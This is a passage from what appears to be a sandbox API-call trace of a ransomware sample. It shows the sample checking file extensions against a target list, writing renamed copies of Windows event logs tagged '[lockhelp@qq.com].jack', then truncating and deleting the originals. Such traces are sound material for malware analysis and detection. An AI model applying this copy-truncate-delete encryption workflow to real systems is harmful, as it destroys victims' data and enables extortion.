35 [0205.591] lstrlenW (lpString=".1cd") returned 4 [0205.591] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.591] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0205.591] lstrlenW (lpString=".jpg") returned 4 [0205.591] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.591] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0205.591] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0205.591] lstrlenW (lpString=".doc") returned 4 [0205.591] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.591] lstrlenW (lpString=".docx") returned 5 [0205.591] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.591] lstrlenW (lpString=".pdf") returned 4 [0205.591] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.591] lstrlenW (lpString=".xls") returned 4 [0205.591] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.591] lstrlenW (lpString=".xlsx") returned 5 [0205.591] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.591] lstrlenW (lpString=".ppt") returned 4 [0205.591] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.591] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0205.592] lstrlenW (lpString=".zip") returned 4 [0205.592] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.592] lstrlenW (lpString=".rar") returned 4 [0205.592] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.592] lstrlenW (lpString=".bz2") returned 4 [0205.592] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.592] lstrlenW (lpString=".7z") returned 3 [0205.592] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.592] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0205.592] lstrlenW (lpString=".dbf") returned 4 [0205.592] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.592] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0205.592] lstrlenW (lpString=".1cd") returned 4 [0205.592] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.592] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0205.592] lstrlenW (lpString=".jpg") returned 4 [0205.592] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.592] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0205.592] lstrlenW (lpString="Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 47 [0205.592] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0205.592] GetFileSizeEx (in: hFile=0x40c, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0205.592] CloseHandle (hObject=0x40c) returned 1 [0205.593] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx")) returned 0x20 [0205.593] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.593] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x40c [0205.593] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.593] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.593] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0205.593] GetLastError () returned 0x0 [0205.593] ReadFile (in: hFile=0x40c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0205.620] WriteFile (in: hFile=0x438, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0205.621] ReadFile (in: hFile=0x40c, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.622] WriteFile (in: hFile=0x438, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x132, lpOverlapped=0x0) returned 1 [0205.622] SetEndOfFile (hFile=0x438) returned 1 [0205.622] CloseHandle (hObject=0x438) returned 1 [0205.623] SetFilePointerEx (in: hFile=0x40c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.623] SetEndOfFile (hFile=0x40c) returned 1 [0205.625] CloseHandle (hObject=0x40c) returned 1 [0205.625] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0205.625] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx")) returned 1 [0205.625] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0205.625] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0205.625] lstrlenW (lpString=".doc") returned 4 [0205.625] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.625] lstrlenW (lpString=".docx") returned 5 [0205.625] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.625] lstrlenW (lpString=".pdf") returned 4 [0205.625] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.625] lstrlenW (lpString=".xls") returned 4 [0205.625] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.625] lstrlenW (lpString=".xlsx") returned 5 [0205.625] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.625] lstrlenW (lpString=".ppt") returned 4 [0205.625] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.625] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0205.625] lstrlenW (lpString=".zip") returned 4 [0205.626] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.626] lstrlenW (lpString=".rar") returned 4 [0205.626] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.626] lstrlenW (lpString=".bz2") returned 4 [0205.626] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.626] lstrlenW (lpString=".7z") returned 3 [0205.626] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.626] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0205.626] lstrlenW (lpString=".dbf") returned 4 [0205.626] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.626] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0205.626] lstrlenW (lpString=".1cd") returned 4 [0205.626] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.626] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0205.626] lstrlenW (lpString=".jpg") returned 4 [0205.626] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.626] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0205.626] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0205.626] lstrlenW (lpString=".doc") returned 4 [0205.626] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.626] lstrlenW (lpString=".docx") returned 5 [0205.626] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.626] lstrlenW (lpString=".pdf") returned 4 [0205.626] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.626] lstrlenW (lpString=".xls") returned 4 [0205.626] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.626] lstrlenW (lpString=".xlsx") returned 5 [0205.626] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.626] lstrlenW (lpString=".ppt") returned 4 [0205.626] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.626] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0205.626] lstrlenW (lpString=".zip") returned 4 [0205.626] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.626] lstrlenW (lpString=".rar") returned 4 [0205.627] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.627] lstrlenW (lpString=".bz2") returned 4 [0205.627] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.627] lstrlenW (lpString=".7z") returned 3 [0205.627] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.627] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0205.627] lstrlenW (lpString=".dbf") returned 4 [0205.627] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.627] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0205.627] lstrlenW (lpString=".1cd") returned 4 [0205.627] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.627] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0205.627] lstrlenW (lpString=".jpg") returned 4 [0205.627] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.627] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0205.627] lstrlenW (lpString="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 78 [0205.627] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0205.631] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0205.631] CloseHandle (hObject=0x3f4) returned 1 [0205.631] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx")) returned 0x20 [0205.631] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.631] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0205.631] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.631] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.631] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0205.631] GetLastError () returned 0x0 [0205.631] ReadFile (in: hFile=0x3f4, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0205.633] WriteFile (in: hFile=0x3e4, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0205.635] ReadFile (in: hFile=0x3f4, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.635] WriteFile (in: hFile=0x3e4, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x170, lpOverlapped=0x0) returned 1 [0205.635] SetEndOfFile (hFile=0x3e4) returned 1 [0205.635] CloseHandle (hObject=0x3e4) returned 1 [0205.640] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.640] SetEndOfFile (hFile=0x3f4) returned 1 [0205.641] CloseHandle (hObject=0x3f4) returned 1 [0205.641] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0205.641] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx")) returned 1 [0205.642] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0205.642] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0205.642] lstrlenW (lpString=".doc") returned 4 [0205.642] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.642] lstrlenW (lpString=".docx") returned 5 [0205.642] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.642] lstrlenW (lpString=".pdf") returned 4 [0205.642] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.642] lstrlenW (lpString=".xls") returned 4 [0205.642] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.642] lstrlenW (lpString=".xlsx") returned 5 [0205.642] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.642] lstrlenW (lpString=".ppt") returned 4 [0205.642] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.642] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0205.642] lstrlenW (lpString=".zip") returned 4 [0205.642] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.642] lstrlenW (lpString=".rar") returned 4 [0205.642] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.642] lstrlenW (lpString=".bz2") returned 4 [0205.642] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.642] lstrlenW (lpString=".7z") returned 3 [0205.642] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.642] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0205.642] lstrlenW (lpString=".dbf") returned 4 [0205.642] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.643] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0205.643] lstrlenW (lpString=".1cd") returned 4 [0205.643] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.643] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0205.643] lstrlenW (lpString=".jpg") returned 4 [0205.812] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.812] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0205.812] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0205.812] lstrlenW (lpString=".doc") returned 4 [0205.813] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.813] lstrlenW (lpString=".docx") returned 5 [0205.813] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.813] lstrlenW (lpString=".pdf") returned 4 [0205.813] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.813] lstrlenW (lpString=".xls") returned 4 [0205.813] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.813] lstrlenW (lpString=".xlsx") returned 5 [0205.813] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.813] lstrlenW (lpString=".ppt") returned 4 [0205.813] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.813] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0205.813] lstrlenW (lpString=".zip") returned 4 [0205.813] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.813] lstrlenW (lpString=".rar") returned 4 [0205.813] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.813] lstrlenW (lpString=".bz2") returned 4 [0205.813] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.813] lstrlenW (lpString=".7z") returned 3 [0205.813] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.813] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0205.813] lstrlenW (lpString=".dbf") returned 4 [0205.813] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.813] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0205.813] lstrlenW (lpString=".1cd") returned 4 [0205.813] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.813] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned 86 [0205.814] lstrlenW (lpString=".jpg") returned 4 [0205.814] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.814] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0205.814] lstrlenW (lpString="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 56 [0205.814] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0205.814] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=69632) returned 1 [0205.814] CloseHandle (hObject=0x430) returned 1 [0205.814] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx")) returned 0x20 [0205.814] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.815] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0205.815] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.815] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.815] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0205.815] GetLastError () returned 0x0 [0205.816] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x11000, lpOverlapped=0x0) returned 1 [0205.818] WriteFile (in: hFile=0x440, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x11010, lpOverlapped=0x0) returned 1 [0205.820] ReadFile (in: hFile=0x430, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.820] WriteFile (in: hFile=0x440, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x144, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x144, lpOverlapped=0x0) returned 1 [0205.821] SetEndOfFile (hFile=0x440) returned 1 [0205.821] CloseHandle (hObject=0x440) returned 1 [0205.823] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.823] SetEndOfFile (hFile=0x430) returned 1 [0205.825] CloseHandle (hObject=0x430) returned 1 [0205.825] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0205.825] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx")) returned 1 [0205.825] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0205.825] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0205.825] lstrlenW (lpString=".doc") returned 4 [0205.825] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.825] lstrlenW (lpString=".docx") returned 5 [0205.826] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.826] lstrlenW (lpString=".pdf") returned 4 [0205.826] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.826] lstrlenW (lpString=".xls") returned 4 [0205.826] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.826] lstrlenW (lpString=".xlsx") returned 5 [0205.826] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.826] lstrlenW (lpString=".ppt") returned 4 [0205.826] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.826] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0205.826] lstrlenW (lpString=".zip") returned 4 [0205.826] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.826] lstrlenW (lpString=".rar") returned 4 [0205.826] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.826] lstrlenW (lpString=".bz2") returned 4 [0205.826] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0205.826] lstrlenW (lpString=".7z") returned 3 [0205.826] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0205.826] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0205.826] lstrlenW (lpString=".dbf") returned 4 [0205.826] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0205.826] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0205.826] lstrlenW (lpString=".1cd") returned 4 [0205.826] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0205.826] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0205.826] lstrlenW (lpString=".jpg") returned 4 [0205.826] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0205.827] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0205.827] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0205.827] lstrlenW (lpString=".doc") returned 4 [0205.827] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0205.827] lstrlenW (lpString=".docx") returned 5 [0205.827] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0205.827] lstrlenW (lpString=".pdf") returned 4 [0205.827] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0205.827] lstrlenW (lpString=".xls") returned 4 [0205.827] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0205.827] lstrlenW (lpString=".xlsx") returned 5 [0205.827] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0205.827] lstrlenW (lpString=".ppt") returned 4 [0205.827] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0205.827] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned 64 [0205.827] lstrlenW (lpString=".zip") returned 4 [0205.827] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0205.827] lstrlenW (lpString=".rar") returned 4 [0205.827] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0205.827] lstrlenW (lpString=".bz2") returned 4 [0205.827] lstrcmpiW (lpString1=".bz2", 